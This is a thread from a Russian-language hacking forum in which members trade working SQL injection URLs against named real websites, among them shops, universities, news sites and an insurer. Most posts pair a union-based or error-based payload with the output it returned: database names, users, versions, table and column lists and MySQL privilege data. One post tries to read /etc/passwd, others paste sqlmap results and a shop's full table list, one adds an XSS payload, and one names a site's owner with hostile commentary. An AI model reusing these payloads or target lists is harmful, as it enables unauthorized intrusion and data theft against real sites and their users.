SQL Инъекции

Discussion in 'Уязвимости' started by yarbabin, 27 Apr 2015.

  1. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    stanok
    Code:
    http://stanok.in.ua/details.php?id=-21292%20union%20select%201,2,3,4,5,6,7,8,9,concat_ws(0x7c,database(),version(),user()),11,12,13,14,15,16,17,18,19,20
    ininterne1_stan|5.5.42-log|[email protected]

    какой то испанский шоп
    Code:
    http://tecnicellmaracaibo.com/product.php?id=-175%27%20uNiOn%20SeLeCt%201,2,concat_ws(0x7c,database(),version(),user()),4,5,6,7,8,9,10,11,12,13--+-
    
    tecni_sitio|5.6.43|tecni@localhost
     
  2. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    Code:
    http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,concat_ws(0x7c,database(),version(),user()),12,13,14,15,16,17,18,19,20,21--+-&type=2
    
    db_eircicai|5.5.51|koresoft@localhost

    и XSS тут же
    Code:
    http://eirc-icai.org/event_details.php?EircstrID=-1473)%20union%20select%201,2,3,4,5,6,7,8,9,10,%3Cscript%3Ealert(%27xss/sqli%27)%3C/script%3E,12,13,14,15,16,17,18,19,20,21--+-&type=2
    
     
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Это называется SiXSS
     
    erwerr2321 likes this.
  4. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    Code:
    http://www.vepakistan.com/detail.php?id=-40+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat_ws(0x3a,version(),database(),user()),19,20--
     
    BabaDook likes this.
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Code:
    http://www.fc-utd.co.uk/report.php?match_id=-1901+union+select+user()+--+
     
    BabaDook likes this.
  6. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Code:
    http://www.kaspiy.az/news.php?id=-103085 UNION SELECT 1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 -- -
     
    BenderMR likes this.
  7. RedHazard

    RedHazard Member

    Joined:
    17 Apr 2011
    Messages:
    70
    Likes Received:
    14
    Reputations:
    8
    Code:
    https://reference-audio-analyzer.pro/review-report.php?id=1691' AND (SELECT 3106 FROM(SELECT COUNT(*),CONCAT(0x7171767671,(SELECT (ELT(3106=3106,1))),0x717a716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Pzbc'='Pzbc
     
    BenderMR likes this.
  8. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    MegaKeys.RU
    Code:
    https://megakeys.ru/soft/product.php?id_d=1972300%27%20union%20select%201,2,3,4,5,6,7,concat_ws(%27|%27,%20database(),user(),version()),9,10--+-#&rtype=good&page=9
     
    RedHazard likes this.
  9. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    Code:
    http://www.semsk.kz/newscat.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user())+--+
     
    BenderMR likes this.
  10. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    BChainHacks
    Code:
    https://www.bchainhacks.com/event.php?id=-122%20%20UNION%20ALL%20SELECT%201,2,concat_ws(0x7c,database(),version(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
    bchain_live|10.2.24-MariaDB|bchain_live_user@localhost
     
  11. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    239
    Likes Received:
    809
    Reputations:
    212
    Code:
    www.all-guitar-chords.com/topic.php?id=-4794' union all select concat_ws(0x23,version(),database(),user(),load_file('/etc/passwd')),2,3,4,5,6,7,8,9,10,group_concat(concat_ws(0x3a3a,host,user,file_priv,insert_priv,update_priv) SEPARATOR " ") FROM mysql.user --%20
    
    5.5.52-MariaDB
    Code:
    https://www.txdirectory.com/online/abc/detail.php?id=217 union select concat_ws(0x3a3a,version(),user(),database(),group_concat(table_name separator " ")),2,3,4 from information_schema.tables where table_schema=database() --%20
    
    5.5.61-0ubuntu0.14.04.1-log
    Code:
    https://www.hotelnewsresource.com/go.php?id=-1298989163' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(substring(concat_ws(0x23,version(),(select schema_name from information_schema.schemata limit 3,1),(select file_priv from mysql.user where user='root' and host='localhost'),0x23), 1), floor(rand(0)*2))) --%20
    
    5.5.60-MariaDB
     
  12. Pop-Xlop

    Pop-Xlop Member

    Joined:
    26 Aug 2019
    Messages:
    20
    Likes Received:
    22
    Reputations:
    8
    Gorev likes this.
  13. Pop-Xlop

    Pop-Xlop Member

    Joined:
    26 Aug 2019
    Messages:
    20
    Likes Received:
    22
    Reputations:
    8
    https://sarov.info Колючий Саров Яндекс ИКС (бывший тИЦ) 3600

    Несколько SQL иньекций.
    Первая:
    Code:
    https://sarov.info/phones/yp/index.php?cat=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3+--+1
    
    [email protected]:5.6.38:admin_bbnews
    Вторая:
    Code:
    curl https://sarov.info/bills/np/doubles.php --data "bill_id%5B1401653 and extractvalue(1,concat(0x3b,(select(version()))))%23%5D=on&delform=1" -H "Authorization: Basic a29sc2FyOmlsZW5hc2Fy"
    
    XPATH syntax error: ';5.6.38'
    Владелец ресурса, Кирилл Асташов aka BadBlock известный в Нижегородской области борец с экстремизмом в комментариях, с последующими заявлениями в центр "Э".
     
  14. Baskin-Robbins

    Baskin-Robbins Reservists Of Antichat

    Joined:
    15 Sep 2018
    Messages:
    239
    Likes Received:
    809
    Reputations:
    212
    Code:
    https://www.6-movies.com/category.php?id=28 union select 1,2,concat_ws(0x3a3a,version(),user(),group_concat(column_name)),4,5,6,7 from information_schema.columns where table_name='chatusers' and table_schema='NauGerComDB2' --%20
    
    5.5.55-0+deb8u1
    Code:
    www.nwu.edu.bd/news_details.php?id=-37 '/*!50000union*/ /*!50000select*/ concat_ws(0x2323,version(),group_concat(table_name)),2 from /*!50000information_schema.tables where table_schema='nwuedu_web'*/ --%20
    
    5.6.41-84.1
    Code:
    www.tpmrotator.com/list.php?id=-2522' union select concat_ws(0x2323,version(),database(),user(),group_concat(table_name separator " ")) from information_schema.tables where table_schema=database() --%20
    
    5.5.60-MariaDB
    Code:
    www.asfaa.org/members.php?id=-14 union select 1,concat_ws(0x23,@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),3,group_concat(table_name separator " ") from information_schema.tables where table_schema=database() --%20
    
    5.6.36-82.0
    Code:
    https://www.testprepkart.com/sat/blog-single.php?id=-12' union select 1,group_concat(column_name separator " "),3,4,5,6,7,concat_ws(0x3a3a,version(),database(),user(),@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),9,10,11,12,13,14,15,16  from information_schema.columns where table_name='admin' and table_schema=database() --%20
    
    5.6.38
    Code:
    https://www.nhe-group.com/category.php?id=-31 '/*!50000union*/ /*!50000select*/ 1,2,3,4,group_concat(column_name),6,7,8,concat_ws(0x2323,version(),user(),0x2323),10,11,12,13,14,15 from /*!50000information_schema.columns where table_schema='ibrahim2_nhegroup' and table_name='admins'*/ --%20
    
    5.6.32-78.1
    Code:
    https://www.htrends.com/go.php?id=927823727' or (select count(*) from (select 1 union select 2 union select 3)b group by concat(mid(concat_ws(0x3a3a,version(),(select schema_name from information_schema.schemata limit 0,1)),1,63), floor(rand(0)*2))) --%20
    
    5.5.60-MariaDB
    Code:
    www.consuladoportugalgoa.com/pages.php?id=-2 union select 1,concat_ws(0x2323,version(),user(),@@hostname,@@version_compile_os,@@datadir,@@tmpdir,@@basedir),group_concat(column_name),4,5,6 from information_schema.columns where table_schema='consulad_con_pc' and table_name='users'--%20
    
    5.7.27
    Code:
    https://www.nitolinsurance.com/news_details.php?id=-1' union select 1,concat_ws(0x2323,version(),user(),database()),3,group_concat(column_name) from information_schema.columns where table_schema='nitolins_website' and table_name='admin' --%20
    
    10.1.41-MariaDB
    Code:
    http://www.ssy.org/detail.php?id=-1' union select 1,concat_ws(0x2323,version(),user(),database()),3,group_concat(cast(table_name as char)),(select cast(schema_name as char) from information_schema.schemata limit 0,1),6,7,8,9,10,11,12,13 from information_schema.tables where table_schema='ssy_datassy' --%20
    
    5.6.45
    Code:
    https://www.compassboxwhisky.com/blog/post-print.php?id=-19' union select 1,concat_ws(0x2323,version(),user()),3,4,5,(select file_priv from mysql.user where user='compassbox'),7,group_concat(table_name),9,10,11,12 from information_schema.tables where table_schema='compassbox'  --%20
    
    5.5.60-MariaDB
    Code:
    https://www.faithandpublicpolicy.org/news.php?id=-464' union select group_concat(table_name),concat_ws(0x2323,version(),user(),(select file_priv from mysql.user where user='webuser')),3,4,5,6,7,8,9,10,11,12,13,14,15,16 from information_schema.tables where table_schema='sys'--%20
    
    5.7.25
     
  15. Arn0ld SHeremetev

    Arn0ld SHeremetev New Member

    Joined:
    6 Sep 2019
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    Code:
    http://www.ibins.ru/useful.php?id=-1%27union+select+1,version(),3,4,database()--+
    
    version:
    5.6.25-73.1

    Code:
    [/B]
    [B]https://www.russianspares.com/products.php?cat=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--+
    

    version
    5.6.45


    Code:
    https://www.wjhy.com.hk/en/product_detail.php?id=25+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,VERSION(),18,19,20,21,22,23--+
    
    version 5.5.40

     
    #235 Arn0ld SHeremetev, 7 Sep 2019
    Last edited: 8 Sep 2019
    Gorev likes this.
  16. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Фрагментированная sql injection в скрипте spartak bux, на нем работают не плохое проекты.

    ||extractvalue(1,concat(0x3a,(select @@version)))#


    Список уязвимых сайтов: (можно найти еще)

    Post запрос (для hack bar)

    Для новичков

     
    #236 WallHack, 3 Oct 2019
    Last edited: 7 Oct 2019
    BenderMR, ExQ, Gorev and 2 others like this.
  17. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    glassofvenice.com
    интернет магазин
    внутри много интересного.

    Code:
    
    https://www.glassofvenice.com/landingpages.php?lp=murano-glass-beads&filters=36_10_38
    
    
    Parameter: lp (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: lp=murano-glass-beads' AND 5931=5931 AND 'HFLm'='HFLm&filters=36_10_38
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: lp=murano-glass-beads' AND (SELECT 2228 FROM(SELECT COUNT(*),CONCAT(0x717a6b7a71,(SELECT (ELT(2228=2228,1))),0x7171766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'rqhj'='rqhj&filters=36_10_38
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: lp=murano-glass-beads' AND SLEEP(5) AND 'AqWz'='AqWz&filters=36_10_38
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 9 columns
        Payload: lp=-8269' UNION ALL SELECT 53,53,53,53,53,53,CONCAT(0x717a6b7a71,0x4a61754d67545a515571454669416b6f567a4d68696c4c4b57546d4a4b4a434c7752545479434164,0x7171766b71),53,53-- lNAv&filters=36_10_38
    ---
    web server operating system: Linux Debian 9.0 (stretch)
    web application technology: Apache 2.4.25
    back-end DBMS: MySQL >= 5.0
    
    
    Database: glassdb
    [145 tables]
    +----------------------------------------------------+
    | address_book                                       |
    | address_format                                     |
    | admin                                              |
    | admin_files                                        |
    | admin_groups                                       |
    | admin_logs                                         |
    | affiliate_affiliate                                |
    | affiliate_banners                                  |
    | affiliate_banners_history                          |
    | affiliate_clickthroughs                            |
    | affiliate_news                                     |
    | affiliate_news_contents                            |
    | affiliate_newsletters                              |
    | affiliate_payment                                  |
    | affiliate_payment_status                           |
    | affiliate_payment_status_history                   |
    | affiliate_sales                                    |
    | amzn_orders                                        |
    | amzn_orders_items                                  |
    | amzn_products                                      |
    | amzn_products_description                          |
    | amzn_products_report                               |
    | amzn_reviews                                       |
    | amzn_seller_feedbacks                              |
    | banners                                            |
    | banners_history                                    |
    | cache                                              |
    | cache_filters                                      |
    | cart_reminder                                      |
    | catalog_product_entity                             |
    | categories                                         |
    | categories_description                             |
    | configuration                                      |
    | configuration_group                                |
    | contrib_tracker                                    |
    | counter                                            |
    | counter_history                                    |
    | countries                                          |
    | coupon_email_track                                 |
    | coupon_gv_customer                                 |
    | coupon_gv_queue                                    |
    | coupon_redeem_track                                |
    | coupons                                            |
    | coupons_description                                |
    | currencies                                         |
    | customer_entity                                    |
    | customers                                          |
    | customers_basket                                   |
    | customers_basket_attributes                        |
    | customers_basket_info                              |
    | customers_info                                     |
    | customers_points_pending                           |
    | customers_temp                                     |
    | directory_country                                  |
    | directory_country_region                           |
    | dos_protect                                        |
    | eav_attribute                                      |
    | eav_attribute_option                               |
    | eav_attribute_option_value                         |
    | emails_templates                                   |
    | etsy_products                                      |
    | etsy_products_images                               |
    | etsy_taxonomies                                    |
    | filter_product_options                             |
    | filter_products_attributes                         |
    | filter_products_options_values                     |
    | filter_products_options_values_to_products_options |
    | geo_zones                                          |
    | giftwrap_options                                   |
    | google_checkout                                    |
    | google_configuration                               |
    | google_orders                                      |
    | headertags                                         |
    | headertags_cache                                   |
    | headertags_default                                 |
    | headertags_pages                                   |
    | headertags_silo                                    |
    | inv_inventory_purchases                            |
    | inv_model_xref                                     |
    | jet_orders                                         |
    | jet_orders_products                                |
    | jet_returns                                        |
    | jet_returns_products                               |
    | jet_returns_products_refund_amount                 |
    | landing_pages                                      |
    | landing_pages_products                             |
    | languages                                          |
    | mage_orders                                        |
    | mage_orders_products                               |
    | manufacturers                                      |
    | manufacturers_info                                 |
    | newsletters                                        |
    | orders                                             |
    | orders_products                                    |
    | orders_products_attributes                         |
    | orders_products_download                           |
    | orders_status                                      |
    | orders_status_history                              |
    | orders_status_history_transactions                 |
    | orders_total                                       |
    | products                                           |
    | products_attributes                                |
    | products_attributes_download                       |
    | products_attributes_relations                      |
    | products_attributes_sets                           |
    | products_attributes_sets_elements                  |
    | products_attributes_sets_to_products               |
    | products_description                               |
    | products_extra_images                              |
    | products_notifications                             |
    | products_options                                   |
    | products_options_values                            |
    | products_options_values_to_products_options        |
    | products_recommend                                 |
    | products_taxonomy_mapping                          |
    | products_to_categories                             |
    | products_variants                                  |
    | products_variants_images                           |
    | products_variants_to_products_attributes           |
    | products_xsell                                     |
    | reviews                                            |
    | reviews_description                                |
    | rma_return_reasons                                 |
    | scart                                              |
    | search_queries                                     |
    | search_queries_sorted                              |
    | searchword_swap                                    |
    | sessions                                           |
    | sitemap_exclude                                    |
    | sliders                                            |
    | sliders_description                                |
    | sliders_images                                     |
    | sliders_images_links                               |
    | specials                                           |
    | tax_class                                          |
    | tax_rates                                          |
    | visitor                                            |
    | visual_verify_code                                 |
    | whos_online                                        |
    | wishlists                                          |
    | wishlists_products                                 |
    | wm_products                                        |
    | ws_products                                        |
    | zones                                              |
    | zones_to_geo_zones                                 |
    +----------------------------------------------------+
    
     
    spherics and BabaDook like this.
  18. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    бд шифрованая ?
     
  19. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    157
    Likes Received:
    41
    Reputations:
    2
    fantasycruncher.com
    сайт спортивной тематики, права на чтение паролей MySQL и всех бд

    Code:
    https://www.fantasycruncher.com/cheatsheet.php?id=783b2c1a48b5b3e0
    
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=783b2c1a48b5b3e0' AND 1291=1291 AND 'YNvr'='YNvr
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=783b2c1a48b5b3e0' AND SLEEP(5) AND 'KAys'='KAys
    ---
    
    web application technology: PHP 5.6.29, Nginx 1.10.1
    back-end DBMS: MySQL 5 (MariaDB fork)
    
    
     
    #239 RWD, 30 Oct 2019
    Last edited: 31 Oct 2019
  20. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Code:
    http://www.wakecamp.ru/index.php?action=item&id=54+and+1=0+union+distinct+select+1,2+